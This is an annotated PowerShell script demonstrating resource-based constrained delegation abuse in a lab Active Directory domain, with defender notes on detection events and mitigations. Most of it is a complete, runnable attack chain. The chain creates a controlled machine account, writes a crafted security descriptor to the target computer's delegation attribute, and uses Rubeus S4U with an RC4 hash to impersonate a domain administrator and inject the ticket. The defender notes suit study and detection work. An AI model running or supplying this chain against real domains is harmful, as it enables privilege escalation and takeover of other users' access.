# Walk-through of resource-based constrained delegation (RBCD) abuse in a lab:
# a principal with write access to a computer object's
# msDS-AllowedToActOnBehalfOfOtherIdentity attribute grants a machine account it
# controls the right to obtain service tickets to that computer on behalf of
# other users.
#
# Tooling assumed in the current directory: PowerView (Get-Domain*,
# Set-DomainObject, ConvertFrom-SID), Powermad (New-MachineAccount) and
# Rubeus.exe. Every object name, password and hash below is lab-specific.
#
# Defender notes -- what each stage leaves behind and what stops it:
#   * a non-admin user creating a machine account (attackersystem$); setting
#     ms-DS-MachineAccountQuota to 0 removes that prerequisite
#   * a write to msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer;
#     with Directory Service Changes auditing on, this surfaces as event 5136
#     on the DC and is the highest-value detection point in this sequence
#   * an S4U ticket request from attackersystem$ for another user (event 4769
#     on the DC); accounts in Protected Users or marked "sensitive and cannot
#     be delegated" cannot be impersonated this way
#   * the cleanup at the end clears the attribute only -- the new machine
#     account and the injected ticket are left in place

# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1

# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
# The only privileges this context needs are the ACE verified below and the
# ability to add a machine account.
whoami

# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"

# SID of the current user; used to pick out its ACEs in the target's DACL
$AttackerSID = Get-DomainUser attacker -Properties objectsid | Select -Expand objectsid

# verify the GenericWrite permissions on $TargetComputer
# Filters the target's ACL to entries whose trustee matches the attacker's SID
# (-match is a regex match against the SID string).
$ACE = Get-DomainObjectACL $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID}
$ACE

# resolve the trustee SID back to a name as a sanity check on the ACE above
ConvertFrom-SID $ACE.SecurityIdentifier

# add a new machine account that we control
# NOTE: this account is never removed later in the script.
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

# get the SID of the new computer we've added
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

# build the new raw security descriptor with this computer account as the principal
# SDDL: owner BA (Builtin Administrators), one Allow ACE granting the listed
# rights to the new machine account's SID. The trustee of this descriptor is
# whom the target computer will trust to act on behalf of other identities.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"

# get the binary bytes for the SDDL
# The attribute stores a binary security descriptor, so serialise it first.
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity'
# This is the actual privilege change; GenericWrite on the computer object is
# sufficient to perform it. Monitor writes to this attribute.
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# confirming the security descriptor add
# Read the attribute back and parse it; DiscretionaryAcl should list the ACE
# built above with attackersystem$ as trustee.
$RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl

# currently don't have access to primary\C$
# Expected to fail at this point: no ticket for primary has been obtained yet.
dir \\primary.testlab.local\C$

# get the hashed forms of the plaintext
# Derives the machine account's Kerberos keys from the password chosen above.
.\Rubeus.exe hash /password:Summer2018! /user:attackersystem /domain:testlab.local

# execute Rubeus' s4u process against $TargetComputer
# EF266C6B963C0BB683941032008AD47F == 'Summer2018!'
# impersonating "harmj0y" (a DA) to the cifs sname for the target computer (primary)
# Authenticates as attackersystem$ with the RC4 key, requests a ticket for the
# impersonated user and then a service ticket to cifs/primary; /ptt loads the
# result into the current logon session. Fails if the impersonated account is
# not delegatable (Protected Users / "sensitive" flag).
.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:harmj0y /msdsspn:cifs/primary.testlab.local /ptt


# cleanup - clear msds-allowedtoactonbehalfofotheridentity
# Only the delegation attribute is reverted; attackersystem$ and the injected
# ticket remain and are the artefacts an investigator should look for.
Get-DomainComputer $TargetComputer | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'